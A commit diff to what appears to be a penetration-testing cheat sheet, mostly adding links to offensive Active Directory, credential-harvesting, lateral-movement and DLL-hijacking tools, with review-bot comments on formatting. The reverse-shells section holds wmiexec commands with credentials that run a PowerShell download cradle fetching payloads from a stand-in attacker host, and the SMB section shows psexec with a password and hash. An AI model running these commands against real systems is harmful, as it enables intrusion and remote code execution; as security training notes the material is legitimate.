[AHK] Automatic update 👽
snovvcrash committed May 8, 2023
1 parent 1b0a284 commit 5d434ce
Showing 10 changed files with 33 additions and 4 deletions.
2 changes: 2 additions & 0 deletions pentest/infrastructure/ad/README.md
Expand Up @@ -61,6 +61,7 @@
- [GOAD - part 10 - Delegations](https://mayfly277.github.io/posts/GOADv2-pwning-part10/)
- [GOAD - part 11 - ACL](https://mayfly277.github.io/posts/GOADv2-pwning-part11/)
- [GOAD - part 12 - Trusts](https://mayfly277.github.io/posts/GOADv2-pwning-part12/)
- [GOAD - part 13 - Having fun inside a domain](https://mayfly277.github.io/posts/GOADv2-pwning-part13/)
- [https://github.com/Orange-Cyberdefense/GOAD](https://github.com/Orange-Cyberdefense/GOAD)


Expand Down Expand Up @@ -433,6 +434,7 @@ PV3 > Get-DomainGPO -Name "<DN>" -Properties DisplayName
* [https://github.com/maaaaz/impacket-examples-windows](https://github.com/maaaaz/impacket-examples-windows)
* [https://github.com/icyguider/MoreImpacketExamples](https://github.com/icyguider/MoreImpacketExamples)
* [https://tools.thehacker.recipes/impacket](https://tools.thehacker.recipes/impacket)
* [https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html](https://www.synacktiv.com/en/publications/traces-of-windows-remote-command-execution.html)
* [https://habr.com/ru/post/703332/](https://habr.com/ru/post/703332/)

Install:
Expand Down
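Review bot: the added Synacktiv entry in the Impacket link list is a bare URL, so nothing tells the reader that it is a write-up on the traces that remote command execution leaves on Windows rather than another tool repository like the entries above it. Give it a descriptive title the way the GOAD entries in this file do, for example `[Traces of Windows remote command execution (Synacktiv)](...)`.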
2 changes: 2 additions & 0 deletions pentest/infrastructure/ad/credential-harvesting/README.md
@@ -1,5 +1,7 @@
# Credentials Harvesting

- [https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary](https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary)




Expand Down
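Review bot: the new Synacktiv link at the top of this file uses the path `/publications/...`, while the Synacktiv link added to `pentest/infrastructure/ad/README.md` in this same commit uses `/en/publications/...`. Use one form for both so the links land on the same language version, and confirm this one does not rely on a redirect.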
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/credential-harvesting/lsa.md
Expand Up @@ -6,6 +6,7 @@ description: Local Security Authority

* [https://www.passcape.com/index.php?section=docsys&cmd=details&id=23](https://www.passcape.com/index.php?section=docsys&cmd=details&id=23)
* [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets)
* [https://github.com/laxa/SharpSecretsdump](https://github.com/laxa/SharpSecretsdump)



Expand Down
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/kerberos/README.md
Expand Up @@ -68,6 +68,7 @@ python3 keytab.py keytab.kt
- [https://github.com/OtterHacker/Cerbere](https://github.com/OtterHacker/Cerbere)
- [https://xakep.ru/2023/04/04/no-mimikatz/](https://xakep.ru/2023/04/04/no-mimikatz/)
- [https://github.com/MzHmO/articles/tree/main/Ticket%20Injector](https://github.com/MzHmO/articles/tree/main/Ticket%20Injector)
- [https://github.com/MzHmO/PowershellKerberos](https://github.com/MzHmO/PowershellKerberos)



Expand Down
1 change: 1 addition & 0 deletions pentest/infrastructure/ad/lateral-movement/rpc.md
Expand Up @@ -5,6 +5,7 @@ description: Remote Procedure Call
# RPC

- [https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/](https://sensepost.com/blog/2021/building-an-offensive-rpc-interface/)
- [https://github.com/s0i37/lateral](https://github.com/s0i37/lateral)



Expand Down
8 changes: 8 additions & 0 deletions pentest/infrastructure/ad/lateral-movement/smb.md
Expand Up @@ -20,3 +20,11 @@ description: Server Message Block
$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/[email protected] powershell
```




## SMB Pivoting

- [https://habr.com/ru/articles/460659/](https://habr.com/ru/articles/460659/)
- [https://github.com/mis-team/rsockspipe](https://github.com/mis-team/rsockspipe)
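Review bot: the new `## SMB Pivoting` section contains two bare links and no description, unlike the section above it, which shows the commands it refers to. Add a sentence on what each resource covers, and tag the `habr.com/ru/` article as Russian-language the way `redteam/infrastructure.md` tags its `[PDF]` entry.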
10 changes: 10 additions & 0 deletions pentest/infrastructure/networks/scanning.md
Expand Up @@ -487,6 +487,16 @@ $ python3 gateway-finder-imp.py -D file_with_dst_IPs.txt -M file_with_nex_hop_MA



### tracebuster

- [https://github.com/s0i37/net/blob/main/tracebuster.py](https://github.com/s0i37/net/blob/main/tracebuster.py)

```
$ python3 tracebuster.py 4 udp 192.168.1.0/24 53 2>/dev/null
```



### NetBIOS


Expand Down
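Review bot: the tracebuster example passes `4 udp 192.168.1.0/24 53` with no explanation of what each positional argument means, and `2>/dev/null` discards all error output, so a reader cannot tell a failed run from an empty result. Add a one-line description of the arguments above the code block. The link also points at `blob/main`, so the script behind it can change independently of this example; a commit permalink would keep the two in step.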
4 changes: 2 additions & 2 deletions pentest/shells/reverse-shells.md
Expand Up @@ -124,9 +124,9 @@ $stream.Dispose()
- [https://github.com/mdsecactivebreach/PowerDNS](https://github.com/mdsecactivebreach/PowerDNS)

```
'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.megacorp.com"""" 16).Strings[0]'
'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'
wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.megacorp.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
```


Expand Down
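Review bot: replacing `cradle.megacorp.com` with `cradle.attacker.com` in both commands swaps one registrable domain for another. Placeholder hostnames in documentation are safer under a reserved name such as `example.com` or the `.example` TLD (RFC 2606), which the Caddy config sample in `redteam/infrastructure.md` already uses for `default_sni`, so that a copy-pasted line never sends DNS queries to a third party's domain.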
6 changes: 4 additions & 2 deletions redteam/infrastructure.md
Expand Up @@ -2,6 +2,7 @@

- [https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d](https://ditrizna.medium.com/design-and-setup-of-c2-traffic-redirectors-ec3c11bd227d)
- [https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4](https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4)
- [https://rastamouse.me/sharpc2-https-with-redirector/](https://rastamouse.me/sharpc2-https-with-redirector/)
- [https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
- [https://github.com/mgeeky/RedWarden](https://github.com/mgeeky/RedWarden)
- [[PDF] Orchestrating Resilient Red Team Operations (Yiannis Ioannides)](https://github.com/secgroundzero/BSides-Cyprus-2019/blob/master/bsides_Cyprus_Yiannis.pdf)
Expand Down Expand Up @@ -285,8 +286,8 @@ Install from apt:

```
$ sudo apt install debian-keyring debian-archive-keyring apt-transport-https -y
$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc
$ curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/gpg.key | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc
$ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt | sudo tee /etc/apt/sources.list.d/caddy-stable.list
$ sudo apt update
$ sudo apt install caddy -y
```
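Review bot: the `gpg.key` line writes the repository key to `/etc/apt/trusted.gpg.d/caddy-stable.asc`, and apt trusts keys in that directory for every configured repository, not only the Caddy one. Consider storing the key in a dedicated keyring file and scoping it to the Caddy source entry with `signed-by`. Separately, dropping the single quotes around the two URLs changes nothing for these particular strings, but quoted URLs are the safer habit in copy-paste commands, so the previous form is worth keeping.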
Expand Down Expand Up @@ -324,6 +325,7 @@ Config sample to act as a reverse proxy:
log
#debug
admin off
#default_sni example.com
#auto_https disable_redirects
}
Expand Down
2 changes: 2 additions & 0 deletions redteam/maldev/dll-hijacking.md
Expand Up @@ -47,6 +47,8 @@ PS > python .\PackMyPayload.py .\out\ .\out\a.iso --out-format iso --hide OneDri

## Tools

- [https://github.com/monoxgas/Koppeling](https://github.com/monoxgas/Koppeling)
- [https://github.com/Flangvik/SharpDllProxy](https://github.com/Flangvik/SharpDllProxy)
- [https://github.com/tothi/dll-hijack-by-proxying](https://github.com/tothi/dll-hijack-by-proxying)


Expand Down
